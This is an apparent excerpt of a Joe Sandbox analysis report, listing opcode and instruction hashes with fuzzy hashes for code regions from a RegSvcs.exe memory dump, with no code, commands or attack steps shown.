                                                              • Opcode Fuzzy Hash: 0f75bb0275caec53d7f356e5476f36516aca5c2711879d5955fff8c74132605d
                                                              • Instruction Fuzzy Hash: 68313076A4012DABCF21DF58DC84BDEBBBAABD8350F1401E5A508A7250DB34DE918F90
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fcbe5284c0dffe1f9e68617a914b9728e46d88669c3456c5c8449cd1eeabb255
                                                              • Instruction ID: 6f3fd55c8917c349c1a2385c35ad20a8d698fe941e9db171141f9abb16062f03
                                                              • Opcode Fuzzy Hash: fcbe5284c0dffe1f9e68617a914b9728e46d88669c3456c5c8449cd1eeabb255
                                                              • Instruction Fuzzy Hash: C431C972E00215AFDB31DFA9CC81AEEBBF9FF44750F054466E515DB250D6709E008BA0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: efb381f8c262c7ec4c31595136c8a7f5d262e9aef5d44e0e5fb040de821c9239
                                                              • Instruction ID: 0ed8d8c656f10431c76010a1adf9c5997cad602f54bd229dc1ef175ba2043574
                                                              • Opcode Fuzzy Hash: efb381f8c262c7ec4c31595136c8a7f5d262e9aef5d44e0e5fb040de821c9239
                                                              • Instruction Fuzzy Hash: 2131C071A40606AFDB22AFADCC50B7EB7BABF84755F404169E906DB352DA70DC01CB90
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c716de0ffd11ac6b246ff4ea0ff66152378b2eb19f8e74b812309f3a59c3bbc5
                                                              • Instruction ID: ee5132bc7dd2192b0878f469394649bfb3f947f1842d6634685465aa19dcc5e2
                                                              • Opcode Fuzzy Hash: c716de0ffd11ac6b246ff4ea0ff66152378b2eb19f8e74b812309f3a59c3bbc5
                                                              • Instruction Fuzzy Hash: 59319372B04612DBCB12DE24C89096BBBE9FFD4650F054969FD59AF290DA30DC1187E2
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 82d9b2c960364ab4244fd2055d9acaa2bc57747c0a1e0050dc8d3720a811256c
                                                              • Instruction ID: af415e29defa61a62dcfa92e45d46fa67d3a56923cbcc74660278cb8de10581a
                                                              • Opcode Fuzzy Hash: 82d9b2c960364ab4244fd2055d9acaa2bc57747c0a1e0050dc8d3720a811256c
                                                              • Instruction Fuzzy Hash: CE3181B26053019FE720CF19C840B1BBBE9FB98700F05496DEA849B791D770E848CB92
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                              • Instruction ID: fabc4e77b77589bbb3955aa63cf91d37c269d50430105476ee2a9e0ae352542f
                                                              • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                              • Instruction Fuzzy Hash: CC3128B2B00B05AFD765CFADCE40B57BBF8BB48A50F04092DA59AC7650F730E9008B60
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a749469d350c49db5137aefa095754efb7a92d986243e7547c21a713910be63d
                                                              • Instruction ID: e3b41fbae8fd990d5df375d05923d88b6e6d30ae35ec41b7eaf314ed9fcf32db
                                                              • Opcode Fuzzy Hash: a749469d350c49db5137aefa095754efb7a92d986243e7547c21a713910be63d
                                                              • Instruction Fuzzy Hash: 7331BA71A453029FC711EF19C94095EBBF1FFC9614F444AAEE498AB311E332D946CBA2
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 044ad5b1a0bb5b6a3409d33c9bcb9396646afbed8cac5d7a9aa870148998fc03
                                                              • Instruction ID: e8d985714a8942c922c8246b987f7541a331f7068884c439e204edc4bd9ad084
                                                              • Opcode Fuzzy Hash: 044ad5b1a0bb5b6a3409d33c9bcb9396646afbed8cac5d7a9aa870148998fc03
                                                              • Instruction Fuzzy Hash: 2231C271B00206DFD720DFA8C9C0AAEBBFABB84304F008529D246DB655D734E941CBA0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                              • Instruction ID: 70cfd37bdfcabfa8a573d477fd7fee16a44a9ce7245c822f990a49c7d53baa47
                                                              • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                              • Instruction Fuzzy Hash: 9B21F232E4065BAADB14ABB9C840BEFBBF5BF54740F0584369A15FF240E270C90087A0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3ab973030ae61fae93221a0e66ba99335b7732e33128477711f5c867aac80dc3
                                                              • Instruction ID: 019b7044cf6f597bb313b184c5bd822e45d7ad90d58f1c890e16f88be260d47f
                                                              • Opcode Fuzzy Hash: 3ab973030ae61fae93221a0e66ba99335b7732e33128477711f5c867aac80dc3
                                                              • Instruction Fuzzy Hash: 9A3149B19402519BDB35AF58CC45B6D7BF4FF90304F4481A9D9859F382EA749981CB90
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                              • Instruction ID: de9f490d128f5786fb6e4ebb5d244d9013a767ea527e7b445266f34cc5ea3445
                                                              • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                              • Instruction Fuzzy Hash: 8F21D836602653ABCB25AB958D00ABEBBB5EF90610F40841EFB958A791F734D950C760
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 354afac749a2bbf6f3e03869e56b636bb4f44528a6a0debd250dafc91a6c3722
                                                              • Instruction ID: fe3a8bf4a3efd84b5eaffddbec6fc85d6e73d3d38830d6794b31254efbaaedea
                                                              • Opcode Fuzzy Hash: 354afac749a2bbf6f3e03869e56b636bb4f44528a6a0debd250dafc91a6c3722
                                                              • Instruction Fuzzy Hash: 6631D831A4012D9BDB31EB18CC42FEE77B9FB55740F0105A1E649BF1A0D6749E808FA0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                              • Instruction ID: 66ab33c9670edfada6e926aa1718c6cbef5dfb5c4339c27f3bf465f0bfcddaec
                                                              • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                              • Instruction Fuzzy Hash: DE217135A00649EFCB15CFA8C990E8EBBB5FF48B14F108069EE159F245D671EA458B90
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf4306732580cb600bca0ffed2973145c2a9b416f06f930ea5e457b843483b2c
                                                              • Instruction ID: 13c57b55f67d29f0a53093da5c1b65e5c44caa1c67666599f7d4cf582b7fa368
                                                              • Opcode Fuzzy Hash: bf4306732580cb600bca0ffed2973145c2a9b416f06f930ea5e457b843483b2c
                                                              • Instruction Fuzzy Hash: 47219C726047469FCB22CE58C890F6BB7E4FB98B60F01492DF9559F641D730E9008BA2
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                              • Instruction ID: 87c50d7f6a57eb73072e724c25bf787449f2e21865c87c76f29d221717bd108a
                                                              • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                              • Instruction Fuzzy Hash: 8E318931600605EFE721DBA8C885F6AB7F9FF85354F1049A9E556DB290E730EE01CB50
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ec92ee4d45843b2f76b3669bb9937ca70ca8f0e94d9d583d3ecd238965073151
                                                              • Instruction ID: 5a6b835ab163ebab239fd1cc7e3fafa05edea6e321e7cbe34745ceca31b8f2cf
                                                              • Opcode Fuzzy Hash: ec92ee4d45843b2f76b3669bb9937ca70ca8f0e94d9d583d3ecd238965073151
                                                              • Instruction Fuzzy Hash: 3B31B175A20225DFCB19CF1CDC849AEB7B5FF84304B154959F8059B391EB32E941CB90
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                              • Instruction ID: 5e8473c1b22b99182b6eb1abe60f95c20215494faff8f45e6db700b1487b3c23
                                                              • Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                              • Instruction Fuzzy Hash: 282136B2601B46DBEB26976CC818B297BF4BF41794F0D04A8DF028F6D2E3A8DC40C251
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 532ea10c2041305e152eaa4ec4a075fc586509167159ec92dbd7ec7168c59030
                                                              • Instruction ID: 2adaf83f405273681ce465e72cee9511e8100c845d1716994c442b882f2901d0
                                                              • Opcode Fuzzy Hash: 532ea10c2041305e152eaa4ec4a075fc586509167159ec92dbd7ec7168c59030
                                                              • Instruction Fuzzy Hash: 10219F7190062AEBCF20DF59CC81ABEB7F8FF48740B544069F941AB254D778AD52CBA0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 24115eb9b3646ed883283e14aa062764bc229fc0d017dd35135c7bddd950c7f7
                                                              • Instruction ID: d7898c2948ecda0f022a93478653c16009bdb533968798bff0a03873dd6775a2
                                                              • Opcode Fuzzy Hash: 24115eb9b3646ed883283e14aa062764bc229fc0d017dd35135c7bddd950c7f7
                                                              • Instruction Fuzzy Hash: B721AB71600606AFDB15DBACCC40E6AB7A8FF98740F184069F904DB790E738ED40CBA8
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 61765cd93ec7c7de0957193f72756b97637fcf33c520530feae5f8987caf2c56
                                                              • Instruction ID: 7f7490ab3871d4e96a414b02490c872cfa2e7fe13e0f9646b239648c33bd0cec
                                                              • Opcode Fuzzy Hash: 61765cd93ec7c7de0957193f72756b97637fcf33c520530feae5f8987caf2c56
                                                              • Instruction Fuzzy Hash: 7C21CF729042469BDB11EF59CC44B9BBBDCBF90244F0C8456B980CB265D730C985C6A2
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ece723b84e773474e9b553a4366304decff0d2afac8c7319a6bee781f51f314c
                                                              • Instruction ID: 62c692fd7fe2b5dd38381a9d7c6a7f9424f3619884be9736f88de0f1028cf029
                                                              • Opcode Fuzzy Hash: ece723b84e773474e9b553a4366304decff0d2afac8c7319a6bee781f51f314c
                                                              • Instruction Fuzzy Hash: 34212931644782DBE722576C8C44B6C7BD4BF41774F280368FA25DF6E2D768D8018262
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9f7ed5e824366f0ba35174a8e95daf81f5a06480f940dbb3697c0570ce006708
                                                              • Instruction ID: a49831a8d1085c2829e30a288e6280697b7746f30d199bb15d81aa747c9c2aa4
                                                              • Opcode Fuzzy Hash: 9f7ed5e824366f0ba35174a8e95daf81f5a06480f940dbb3697c0570ce006708
                                                              • Instruction Fuzzy Hash: 0721AC75250602AFC72ADF69CC00B56B7F5BF48B08F24846CA509CF761E371E842CB94
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9d8daf805e5a4965dbea2630a209feb804871d0b69b51d144fe61d69c38832fc
                                                              • Instruction ID: 8a711b82835785a07e3fa9326d7bd2cd4f2876440fb25744396bf4365aa41021
                                                              • Opcode Fuzzy Hash: 9d8daf805e5a4965dbea2630a209feb804871d0b69b51d144fe61d69c38832fc
                                                              • Instruction Fuzzy Hash: B421E9B1E00359ABCB20DFAAD8919AEFBF9FF98610F10022EE505A7354D7709941CB54
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                              • Instruction ID: 17cd3c0c25b4add35bb98c69e32fd9838bef8cc3ed440d2fddf62102093729ae
                                                              • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                              • Instruction Fuzzy Hash: FA216772A0061AAFDB129F98CC44BAEBBFAFF98315F204859F940A7291D734D9518F50
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                              • Instruction ID: a52da0de00a237fec570c8a361c0cfcf9d772a5a4def2b58937aab115106e541
                                                              • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                              • Instruction Fuzzy Hash: 62119D76601606EFE7229E99DC41FAABBB8FBD0B64F10442DF6049F190E671ED44CB60
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 79f7db2cd7048835c916828634870bfb69cf9e05f3d1e55f1aa11cce05d653d7
                                                              • Instruction ID: 26653dea074a35aa9936b0afbb7312ab3fb00b0440567347c36d02360926026e
                                                              • Opcode Fuzzy Hash: 79f7db2cd7048835c916828634870bfb69cf9e05f3d1e55f1aa11cce05d653d7
                                                              • Instruction Fuzzy Hash: E611C1717006199BDF15CF4DC5C0A6EBBE9BF8B710B1980ADEE089F205D6B2D901C792
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                              • Instruction ID: 611ba9e9afeb7b27bd05996c38e9c3f50ce21f5b26e28704dde88c60233a865f
                                                              • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                              • Instruction Fuzzy Hash: A7217972640A49DFD7268F89C540A6AFBF6FB94F14F14887DE54A9B610E730EC01CB90
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3189717abd5d2ece819a3952968cf4d75001b7b6541e76b60ee997c67279e21b
                                                              • Instruction ID: ae4264008e0431efb1f924fe278661b604875b370e048980796cec4da2cabad1
                                                              • Opcode Fuzzy Hash: 3189717abd5d2ece819a3952968cf4d75001b7b6541e76b60ee997c67279e21b
                                                              • Instruction Fuzzy Hash: 8421AE75A0020ADFCB14CFA8C580AAEBBF5FB89318F20416DD105AB310CB71AD06DBD1
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 785c49ed786e517d2cf8ec11dde2897a27df277b7f437ee395b020f4b2444b08
                                                              • Instruction ID: f80a017e9de4d7c4308ff7ae6d2315ac88f4c1c3f8d84d6e625833a162df3091
                                                              • Opcode Fuzzy Hash: 785c49ed786e517d2cf8ec11dde2897a27df277b7f437ee395b020f4b2444b08
                                                              • Instruction Fuzzy Hash: BB218E75510A01EFD7308FA9C840F66B7E8FF84650F40882DE69ACB751EB30A950CB60
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d2e316ae9d4a45993a61422827938d7770c825e34b1d9b3f3793cea5d9f40c56
                                                              • Instruction ID: 8d66b9970faac24d37c7256b393766a9dd7ff18d69e59d9648246936c7defeda
                                                              • Opcode Fuzzy Hash: d2e316ae9d4a45993a61422827938d7770c825e34b1d9b3f3793cea5d9f40c56
                                                              • Instruction Fuzzy Hash: EA11C132740926EFC722CB69CD40F9AB7A8FF95750F014025FA01DB250DA74E801CBA0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ad9dc9a84a890576bdbc42aabc977f8fc3f9fae4cdba6f36ba6db05e9403e9b4
                                                              • Instruction ID: 47927ba192d16f35245fa5a44b7bda112ea4005cde227cf2a620c6de6065e0e7
                                                              • Opcode Fuzzy Hash: ad9dc9a84a890576bdbc42aabc977f8fc3f9fae4cdba6f36ba6db05e9403e9b4
                                                              • Instruction Fuzzy Hash: E4110C333041159FCB1ADB29CC91ABF7297FFD5374B29452DE522CF291DA309801C290
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf96612c7d02de0bfc37c423ef4503b4d961e97cd44c0e97370d561ed905f209
                                                              • Instruction ID: 56f2e79b9dea4b6c6141773c6629ede5738ce081dd60d4eb9ad9b870a5c9031a
                                                              • Opcode Fuzzy Hash: cf96612c7d02de0bfc37c423ef4503b4d961e97cd44c0e97370d561ed905f209
                                                              • Instruction Fuzzy Hash: 0C119E76A01206EFCB25DF99DA80A5EBBF9BF94A50F45847DD9099F311E630DE00CB90
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                              • Instruction ID: 6ccaec65de8db60055f3342a3422f3f4e981c19623aefff217b71223d1eadc99
                                                              • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                              • Instruction Fuzzy Hash: 9E11B236A10915AFDB19CB98CC05A9DBBB6EF84210F058269EC5597340E671AD51CBD0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                              • Instruction ID: d388630ee27b3b424baf9eb6d9eab769d256ec8d615fdd8c66678083530c345b
                                                              • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                              • Instruction Fuzzy Hash: 682108B5A40B059FD3A0CF29D440B56BBF4FB48720F10492EE98ACBB40E371E814CB90
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                              • Instruction ID: f68f80fbf10fde36823054c983b466dcea64c2ecbe22a08d17bbc8bf7fff6f13
                                                              • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                              • Instruction Fuzzy Hash: 9111A331600601EFEB729F48CC40B5A7BA6EF45754F0A842CEE0A9B254DB32DC41DB90
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7c5ff0c1771f745fe4a125b65f194f984a709091905706666a83f326a014076c
                                                              • Instruction ID: 84bf8afc16bb8a098deaf156069a365df024df84d0b9fd31e53b3e85ad9f430d
                                                              • Opcode Fuzzy Hash: 7c5ff0c1771f745fe4a125b65f194f984a709091905706666a83f326a014076c
                                                              • Instruction Fuzzy Hash: 9601C431645786ABE316A66EDC84F6B6ADCFF80694F050469FA058F291E954EC00C2B2
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e6a53e21b5c00f5d5f8f4f28dd0037219c923c50cca5663943308952101bb2d
                                                              • Instruction ID: 244175d609a725ce51eeee8f87385354a03e2a5066193adf768850df777b82ff
